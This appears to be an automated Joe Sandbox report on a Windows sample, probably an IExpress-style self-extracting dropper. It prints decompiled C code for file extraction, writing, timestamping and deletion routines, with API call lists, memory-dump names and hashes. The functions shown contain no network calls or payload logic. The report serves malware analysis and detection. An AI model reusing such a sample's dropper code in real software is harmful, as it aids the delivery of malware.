0x00ce5305
0x00ce530c
0x00ce5312
0x00ce5316
0x00ce5316
0x00ce5317
0x00ce531c
0x00ce531f
0x00ce5333
0x00ce5345
0x00ce5351
0x00ce5359
0x00ce5359
0x00ce5363
0x00ce5369
0x00ce536f
0x00ce5374
0x00ce5374
0x00ce5381
0x00ce5387
0x00ce5387
0x00ce538f
0x00ce53a0

APIs

SetFileAttributesA.KERNELBASE(02ED7C70,00000080,?,00000000), ref: 00CE52F2
DeleteFileA.KERNELBASE(02ED7C70), ref: 00CE52FA
LocalFree.KERNEL32(02ED7C70,?,00000000), ref: 00CE5305
LocalFree.KERNEL32(02ED7C70), ref: 00CE530C
SetCurrentDirectoryA.KERNELBASE(00CE11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE5363

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE5334

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 2833751637-2356899610
Opcode ID: 563da302ad68d65c3963a26e8ec2f0129114fba61b985f2202a96139bb346b41
Instruction ID: 25c7572cb5d3754ed4b7a8cd819a77dea0ff3e1f6dc3442b0b65242bfea08918
Opcode Fuzzy Hash: 563da302ad68d65c3963a26e8ec2f0129114fba61b985f2202a96139bb346b41
Instruction Fuzzy Hash: 7121C3315106D4DFDB209B12DD89B6D77B4FB14794F040169E8565A1B0CFB49E88EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CE4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xce8004; // 0xd1db73d
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xce91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00CE4E99(_t75);
						L35:
						return E00CE6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xce8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xce91e4;
						_t58 = 0xce91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xce91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xce91e4;
						_t30 = E00CE4702( &_v268, 0xce91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00CE476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00CE4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00CE47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xce93f4 =  *0xce93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xce91e4;
						_t63 = 0xce91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xce91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xce91e4;
						_t30 = E00CE4702( &_v268, 0xce91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00CE4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00CE4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00CE4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00ce4cd0
0x00ce4cdb
0x00ce4ce0
0x00ce4ce2
0x00ce4cee
0x00ce4cf2
0x00ce4d0e
0x00ce4d0e
0x00ce4d11
0x00ce4e83
0x00ce4e88
0x00ce4e98
0x00ce4e98
0x00ce4d17
0x00ce4d17
0x00ce4d1a
0x00ce4d2f
0x00ce4d2f
0x00000000
0x00ce4d2f
0x00ce4d1c
0x00ce4d1c
0x00ce4d1f
0x00ce4dcb
0x00ce4dd0
0x00ce4dd2
0x00ce4ddd
0x00ce4ddd
0x00ce4de3
0x00ce4de8
0x00ce4ded
0x00ce4ded
0x00ce4def
0x00ce4df0
0x00ce4df0
0x00ce4df4
0x00ce4df4
0x00ce4df6
0x00ce4df9
0x00ce4dfc
0x00ce4dfc
0x00ce4dfe
0x00ce4dff
0x00ce4dff
0x00ce4e03
0x00ce4e08
0x00ce4e0a
0x00ce4e0f
0x00ce4d03
0x00ce4d03
0x00000000
0x00ce4d03
0x00ce4e18
0x00ce4e20
0x00ce4e25
0x00ce4e27
0x00000000
0x00000000
0x00ce4e33
0x00ce4e38
0x00ce4e3a
0x00000000
0x00000000
0x00ce4e40
0x00ce4e51
0x00ce4e56
0x00ce4e5b
0x00ce4e5e
0x00000000
0x00000000
0x00ce4e6a
0x00ce4e6f
0x00ce4e71
0x00000000
0x00000000
0x00ce4e77
0x00ce4e7d
0x00000000
0x00ce4e7d
0x00ce4d25
0x00ce4d25
0x00ce4d28
0x00ce4d36
0x00ce4d3b
0x00ce4d40
0x00ce4d40
0x00ce4d42
0x00ce4d43
0x00ce4d43
0x00ce4d47
0x00ce4d4a
0x00ce4d4a
0x00ce4d4c
0x00ce4d4f
0x00ce4d4f
0x00ce4d51
0x00ce4d52
0x00ce4d52
0x00ce4d56
0x00ce4d5b
0x00ce4d5d
0x00ce4d62
0x00000000
0x00000000
0x00ce4d67
0x00ce4d6f
0x00ce4d74
0x00ce4d76
0x00000000
0x00000000
0x00ce4d7c
0x00ce4d84
0x00ce4d89
0x00ce4d8b
0x00000000
0x00000000
0x00ce4d94
0x00ce4d99
0x00ce4d9e
0x00ce4da1
0x00ce4daa
0x00ce4daa
0x00ce4da3
0x00ce4da3
0x00ce4da3
0x00ce4db5
0x00ce4dbb
0x00ce4dbd
0x00000000
0x00ce4dc3
0x00ce4dc5
0x00000000
0x00ce4dc5
0x00ce4dbd
0x00ce4d2a
0x00ce4d2a
0x00ce4d2d
0x00000000
0x00000000
0x00000000
0x00ce4d2d
0x00ce4cf8
0x00ce4cfd
0x00ce4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00CE4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00CE4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE4D36, 00CE4DE3

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-2356899610
Opcode ID: 52029cee0c4746c7eb1790a515947ea33dab59095bfcb6441e48973f80bdd468
Instruction ID: f714f0aa4046e2971951b00669d11391f2cd08a6fdd71b6296885c8cce5ed418
Opcode Fuzzy Hash: 52029cee0c4746c7eb1790a515947ea33dab59095bfcb6441e48973f80bdd468
Instruction Fuzzy Hash: B14145366001818BCF2D8F3ADD446F9B3A6EB45300F184668E8A297281DB31DF4AD790

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xce8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xce8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00ce4c40
0x00ce4c4a
0x00ce4c8d
0x00000000
0x00ce4c70
0x00ce4c70
0x00ce4c7e
0x00ce4c86
0x00000000
0x00000000
0x00000000
0x00ce4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00CE4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CE4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00CE4C7E

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 45fe3abe3089642d4ebae01c41ffc3dde74902b947e63776b6e5a0e776713033
Instruction ID: 10285c63136b6ce396cfb2e904763fbcf3114972106ada7dbf615fc17db7f9fb
Opcode Fuzzy Hash: 45fe3abe3089642d4ebae01c41ffc3dde74902b947e63776b6e5a0e776713033
Instruction Fuzzy Hash: 3AF0967250128DAF9B19DFB6CC48EBF77ACEB08244744052AA416C2050EB34FA14D761

Uniqueness

Uniqueness Score: -1.00%

Function 00CE487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CE487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00CE490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00ce4880
0x00ce488c
0x00ce4894
0x00ce48a0
0x00ce48c9
0x00ce48ce
0x00ce48a2
0x00ce48a8
0x00ce48b7
0x00ce48bc
0x00ce48aa
0x00ce48ac
0x00ce48ac
0x00ce48a8
0x00ce48de
0x00ce48e7
0x00ce490b
0x00ce48ee
0x00ce48f0
0x00000000
0x00ce4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00CE4A23,?,00CE4F67,*MEMCAB,00008000,00000180), ref: 00CE48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00CE4F67,*MEMCAB,00008000,00000180), ref: 00CE4902

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f59adc24568618c2be2f27c044407419900ef32d510d7f1b1dbd2ed1c3858b2
Instruction ID: 6561ebcb364c9c9699a751861a3b460dc3d232f75c591e36687503af4ba3ca6f
Opcode Fuzzy Hash: 1f59adc24568618c2be2f27c044407419900ef32d510d7f1b1dbd2ed1c3858b2
Instruction Fuzzy Hash: 94016DA3E115B02AF338402A4C88FBB551CCBD6735F1B0334BDEAEB1D2D5A45C0491E0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CE4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xce858c; // 0xb4
				_t9 = E00CE3680(_t20);
				if( *0xce91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xce8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xce9400; // 0x3aa00
							_t15 = _t14 + _t25;
							 *0xce9400 = _t15;
							if( *0xce8184 != 0) {
								_t21 =  *0xce8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xce93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00ce4ad5
0x00ce4adb
0x00ce4ae7
0x00ce4aee
0x00ce4b05
0x00ce4b0d
0x00ce4b14
0x00ce4b1a
0x00ce4b1c
0x00ce4b21
0x00ce4b2a
0x00ce4b2f
0x00ce4b31
0x00ce4b39
0x00ce4b54
0x00ce4b54
0x00ce4b39
0x00ce4b2f
0x00ce4b0f
0x00ce4b0f
0x00ce4b0f
0x00ce4b5e
0x00ce4ae9
0x00ce4aed
0x00ce4aed

APIs

Part of subcall function 00CE3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00CE369F
Part of subcall function 00CE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE36B2
Part of subcall function 00CE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00CE4B05

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: e99af222d2ef1c1d04c79ef4f9a6469aad49a536c424998647dc5a72ecbf581d
Instruction ID: bb6b091add813017d8134224895c297ba40c393a9632c2128947d8e691b2b780
Opcode Fuzzy Hash: e99af222d2ef1c1d04c79ef4f9a6469aad49a536c424998647dc5a72ecbf581d
Instruction Fuzzy Hash: 4D01B131200681ABDB198F6ADC85BAA776AFB44725F048225F9399F1F0CB74D911CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00CE658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xce8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xce8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00CE16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00ce6592
0x00ce6594
0x00ce6596
0x00ce6598
0x00ce6598
0x00ce659b
0x00ce659b
0x00ce659d
0x00ce659e
0x00ce65a2
0x00ce65a4
0x00ce65a9
0x00ce65b2
0x00ce65b6
0x00ce65ba
0x00ce65c3
0x00ce65c5
0x00ce65c8
0x00ce65c8
0x00ce65c3
0x00ce65c9
0x00ce65cc
0x00ce65d2
0x00ce65d1
0x00ce65d1
0x00000000
0x00ce65dc
0x00000000

APIs

CharPrevA.USER32(00CE8B3E,00CE8B3F,00000001,00CE8B3E,-00000003,?,00CE60EC,00CE1140,?), ref: 00CE65BA

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 73dd00199dc3b1bd661f6c951bd265fa526dd53955fb296331c1d9acadcc6c08
Instruction ID: 41c3c6ae7362f841a1f4250aafda33de2d3fc8cfb640e2103698b9a69e91e04c
Opcode Fuzzy Hash: 73dd00199dc3b1bd661f6c951bd265fa526dd53955fb296331c1d9acadcc6c08
Instruction Fuzzy Hash: 92F02D323052D09BD331051B9884B6BBFDD9BA5390F18055AE8EA83205CA655D4583A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CE621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xce8004; // 0xd1db73d
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00CE597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00CE44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xce9124 = E00CE6285();
					_t9 = 0;
				}
				return E00CE6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00ce6229
0x00ce6230
0x00ce6247
0x00ce626a
0x00ce6272
0x00ce6249
0x00ce6255
0x00ce625f
0x00ce6264
0x00ce6264
0x00ce6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00CE623F

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Part of subcall function 00CE6285: GetLastError.KERNEL32(00CE5BBC), ref: 00CE6285

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 3e6e10cefa6def33ebd86a62f69046903be023c1c977c30ed83924b70c6fa07c
Instruction ID: 6e44cef4776564e843eb4ad00cb6eda1395f687f48522dc06c066c4b8695063e
Opcode Fuzzy Hash: 3e6e10cefa6def33ebd86a62f69046903be023c1c977c30ed83924b70c6fa07c
Instruction Fuzzy Hash: 10F0E970700248AFD750EB759D42FBE77BCDB54340F500469BA86DB182DD749D449650

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xce8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xce8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xce8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xce8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xce8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xce8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xce8d6c)) = 0;
				return 0;
			}

0x00ce4b66
0x00ce4b74
0x00ce4b98
0x00ce4ba0
0x00000000
0x00ce4bac
0x00ce4ba4
0x00000000
0x00ce4ba4
0x00ce4b78
0x00ce4b7e
0x00ce4b84
0x00ce4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00CE4FA1,00000000), ref: 00CE4B98

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: f55c087ebc06f91d84fac9041fe7ebdd846af95fb50a863beb938f664c2c8442
Instruction ID: 8777d906d5c44d212c13095301f5c198742fc5618f6d3584f512f6bf3b2687d0
Opcode Fuzzy Hash: f55c087ebc06f91d84fac9041fe7ebdd846af95fb50a863beb938f664c2c8442
Instruction Fuzzy Hash: 5FF01C31500F899F8775CF3BCC00652BBE4BAA53603101E2E946ED2194EB31AA59EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CE66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00ce66b1
0x00ce66ba
0x00ce66c7
0x00ce66bc
0x00ce66be
0x00ce66be

APIs

GetFileAttributesA.KERNELBASE(?,00CE4777,?,00CE4E38,?), ref: 00CE66B1

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 72a7c6d95c880d251daa010adf275ce0cb39c3f5928fbdabe0f87d28b2f21e68
Instruction ID: 773fdcb68c3760de7577a872b772fa5436f480e17d44e8a94de7a6c0683a51de
Opcode Fuzzy Hash: 72a7c6d95c880d251daa010adf275ce0cb39c3f5928fbdabe0f87d28b2f21e68
Instruction Fuzzy Hash: 1BB09276232580466A2016326C6965A2845A6D123A7E52B90F033C01E0CA3EDA46D004

Uniqueness

Uniqueness Score: -1.00%

Function 00CE4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00ce4caa
0x00ce4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00CE4CAA

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

